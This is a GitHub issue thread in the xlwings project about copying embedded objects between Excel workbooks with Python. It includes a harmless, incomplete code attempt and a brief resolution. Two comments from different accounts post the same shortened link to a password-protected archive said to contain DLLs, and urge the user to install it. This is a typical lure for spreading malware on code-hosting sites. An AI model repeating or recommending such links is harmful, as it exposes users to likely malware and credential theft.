### ISSUE TITLE
Copy unknown objects from master excel to multiple child excel files

### ISSUE THREAD

**Issue by Ak784** [xlwings/xlwings#2521]
#### Versions of xlwings, Excel and Python (0.11.8, Excel 2019, Python 3.9)

In my source excel sheet, I have two objects that appear like as shown below

<img width="830" alt="image" src="https://github.com/user-attachments/assets/bf32b234-7efa-4961-8e17-487270cac95c">

I am able to increase, decrease the size of each of the object manually in my source excel sheet. Also, I am able to edit the contents of this object. This object is always present within 1st 20 rows of the sheet. 

Now, my objective is to do the below

a) copy these objects (whether image/text object etc) from source excel sheet test.xlsx and paste it in test1.xlsx, test2.xlsx, test3.xlsx and test4.xlsx etc.

b) maintain the same size and position like where it appears in the source excel sheet test.xlsx.

So, I tried the below but it is going no where. Can somebody here help me on how this can be achieved using python?

```python
import xlwings as xw

# Load the source workbook
source_workbook = xw.Book('test.xlsx')
source_sheet = source_workbook.sheets[0]

objects_to_copy = []
for row in range(1, 21):
    for col in range(1, source_sheet.range(f"A{row}").end('right').column):
        cell = source_sheet.range((row, col))

        if cell.api.Comment:
            img = cell.api.Comment.Shape.CopyPicture()
            objects_to_copy.append((img, cell))

destination_workbooks = ['test1.xlsx', 'test2.xlsx', 'test3.xlsx', 'test4.xlsx']

for dest_workbook_name in destination_workbooks:
    dest_workbook = xw.Book()
    dest_sheet = dest_workbook.sheets[0]
```

**Comment by pinpolhoxx** [comment]
I think this will help you.

https://bit.ly/3TCbXO6
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by SAMBILI** [comment]
install this

https://bit.ly/3TCbXO6
Archive password: changeme
I put the necessary dlls in the archive

**Comment by fzumstein** [comment]
Please attach a sample workbook.

**Comment by Ak784** [comment]
Thanks. But I solved this with the help of Shutil and xlwings. So, this can
be closed..
